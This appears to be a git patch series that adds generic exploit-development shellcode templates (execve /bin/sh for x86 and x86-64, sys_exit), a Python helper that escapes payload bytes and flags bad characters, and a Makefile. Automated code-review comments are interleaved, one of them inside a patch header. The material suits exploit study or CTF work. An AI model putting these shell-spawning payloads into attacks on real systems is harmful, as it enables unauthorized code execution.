From e9cb4e14009a9ea3cbd08c2c4992d0e24b69e097 Mon Sep 17 00:00:00 2001
From: Malfurious
Date: Sun, 22 Aug 2021 05:52:56 -0400
Subject: Add generic /bin/sh shellcode templates

Signed-off-by: Malfurious
---
 templates/shellcode/shell32.asm | 14 ++++++++++++++
 templates/shellcode/shell64.asm | 15 +++++++++++++++
 2 files changed, 29 insertions(+)
 create mode 100644 templates/shellcode/shell32.asm
 create mode 100644 templates/shellcode/shell64.asm
(limited to 'templates/shellcode')
diff --git a/templates/shellcode/shell32.asm b/templates/shellcode/shell32.asm
new file mode 100644
index 0000000..d12910f
--- /dev/null
+++ b/templates/shellcode/shell32.asm
@@ -0,0 +1,14 @@
+[SECTION .text]
+global _start
+
+; https://www.exploit-db.com/shellcodes/46809
+
+_start:
+ xor ecx, ecx
+ push 0xb
+ pop eax
+ push ecx
+ push 0x68732f2f
+ push 0x6e69622f
+ mov ebx, esp
+ int 0x80
diff --git a/templates/shellcode/shell64.asm b/templates/shellcode/shell64.asm
new file mode 100644
index 0000000..a6d4626
--- /dev/null
+++ b/templates/shellcode/shell64.asm
@@ -0,0 +1,15 @@
+[SECTION .text]
+global _start
+
+; https://www.exploit-db.com/shellcodes/47008
+
+_start:
+ xor rsi, rsi
+ push rsi
+ mov rdi, 0x68732f2f6e69622f
+ push rdi
+ push rsp
+ pop rdi
+ mov al, 0x3b
+ cdq
+ syscall
--
cgit v1.2.3
From 9a5f29e228846a2a7fda8497e72c94cad516376c Mon Sep 17 00:00:00 2001
From: Malfurious
Date: Sun, 22 Aug 2021 06:03:20 -0400
Subject: Add sys_exit shellcode templates

Signed-off-by: Malfurious
---
 templates/shellcode/exit32.asm | 8 ++++++++
 templates/shellcode/exit64.asm | 8 ++++++++
 2 files changed, 16 insertions(+)
 create mode 100644 templates/shellcode/exit32.asm
 create mode 100644 templates/shellcode/exit64.asm
(limited to 'templates/shellcode')
diff --git a/templates/shellcode/exit32.asm b/templates/shellcode/exit32.asm
new file mode 100644
index 0000000..559c89c
--- /dev/null
+++ b/templates/shellcode/exit32.asm
@@ -0,0 +1,8 @@
+[SECTION .text]
+global _start
+
+_start:
+ xor ebx, ebx
+ xor eax, eax
+ mov al, 0x1
+ int 0x80
diff --git a/templates/shellcode/exit64.asm b/templates/shellcode/exit64.asm
new file mode 100644
index 0000000..fb899a2
--- /dev/null
+++ b/templates/shellcode/exit64.asm
@@ -0,0 +1,8 @@
+[SECTION .text]
+global _start
+
+_start:
+ xor rdi, rdi
+ mov al, 0x3c
+ cdq
+ syscall
--
cgit v1.2.3
From 89c13129a55ccbecda31614c83e88612972c11a6 Mon Sep 17 00:00:00 2001
From: Malfurious
Date: Sun, 22 Aug 2021 08:25:26 -0400
Subject: Refactor genhex into shelltool

For convenience, I've rewritten my old shellcode parser program in Python. It is moved to the shellcode templates dir and renamed to shelltool. As a new feature, shelltool will now check the result for NULL bytes and newline bytes that may cause problems in an exploit.

Signed-off-by: Malfurious
---
 templates/shellcode/shelltool.py | 30 ++++++++++++++++++++++++++++++
 1 file changed, 30 insertions(+)
 create mode 100755 templates/shellcode/shelltool.py
(limited to 'templates/shellcode')
diff --git a/templates/shellcode/shelltool.py b/templates/shellcode/shelltool.py
new file mode 100755
index 0000000..b95a8cd
--- /dev/null
+++ b/templates/shellcode/shelltool.py
@@ -0,0 +1,30 @@
+#!/usr/bin/env python
+
+# This script will convert shellcode disassembly into an escaped string literal
+# and warn about problematic bytes in the payload.
+# objdump -d elf | ./shelltool.py
+
+import sys
+
+name = None
+bytecode = []
+badchars = [ 0x00, 0x0a ]
+
+for line in sys.stdin:
+ for tok in line.split():
+ if name is None:
+ name = tok
+ if len(tok) == 2:
+ try:
+ bytecode.append(int(tok, base=16))
+ except:
+ pass
+
+result = ''.join([ "\\x%02x"%(x) for x in bytecode ])
+result = f'{name}"{result}"'
+
+for x in badchars:
+ if x in bytecode:
+ result += f' **0x{"%02x"%(x)} detected**'
+
+print(result)
--
cgit v1.2.3
From d0e68f51eae112447289f2bcf541c4a4882ec741 Mon Sep 17 00:00:00 2001
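Review bot: The bare `except:` around `bytecode.append(int(tok, base=16))` swallows every exception, including KeyboardInterrupt and SystemExit, when the only failure it needs to skip is a non-hex token; narrow it to `except ValueError:` and the `pass` keeps its best-effort meaning. The shebang `#!/usr/bin/env python` is also a problem because the script uses f-strings, so on a system where `python` resolves to Python 2 it dies with a SyntaxError before reading stdin; `#!/usr/bin/env python3` pins the interpreter the code actually requires. The `len(tok) == 2` filter presumably treats any two-hex-digit token as an opcode byte rather than keying off objdump's raw-bytes column, and `name` is whatever the first token on stdin happens to be, so a comment stating those assumptions would help the next reader, e.g. `# assumes every 2-hex-digit token is a raw instruction byte and the first token is the ELF name — TODO confirm against objdump -d output`.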
From: Malfurious
Date: Sun, 22 Aug 2021 09:24:04 -0400
Subject: Add Makefile for shellcode templates

The shell*.asm files are considered the default programs and the expected use-case for utilizing the templates is to edit these files to implement the desired shellcode. I figure that literal shellcode makes the most sense of what to expect by default. 'make all' will assemble and link the shellcode (so it can actually be directly executed via the output elf files), and feed the disassembly into shelltool for use elsewhere.

Signed-off-by: Malfurious
---
 templates/shellcode/Makefile | 17 +++++++++++++++++
 1 file changed, 17 insertions(+)
 create mode 100644 templates/shellcode/Makefile
(limited to 'templates/shellcode')
diff --git a/templates/shellcode/Makefile b/templates/shellcode/Makefile
new file mode 100644
index 0000000..2e67adc
--- /dev/null
+++ b/templates/shellcode/Makefile
@@ -0,0 +1,17 @@
+.PHONY: all
+
+all: shell32.elf shell64.elf
+ @objdump -d shell32.elf | ./shelltool.py
+ @objdump -d shell64.elf | ./shelltool.py
+
+shell32.o: shell32.asm
+ nasm -f elf shell32.asm -o shell32.o
+
+shell32.elf: shell32.o
+ ld -melf_i386 shell32.o -o shell32.elf
+
+shell64.o: shell64.asm
+ nasm -f elf64 shell64.asm -o shell64.o
+
+shell64.elf: shell64.o
+ ld shell64.o -o shell64.elf
--
cgit v1.2.3
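Review bot: The Makefile has no `clean` target and `.PHONY` declares only `all`, so the generated `.o` and `.elf` files can only be removed by hand between edits of the template sources; add `.PHONY: all clean` and a `clean:` rule whose recipe is `rm -f shell32.o shell32.elf shell64.o shell64.elf`. The `all` recipe is worth a one-line comment because it is the real purpose of the target and runs on every invocation since `all` is phony, e.g. `# print each payload as an escaped string (see shelltool.py); re-run on every make`. The four build rules are pairwise identical apart from the 32/64 suffix and flags, so pattern rules would shorten the file, but that is a style choice rather than a defect.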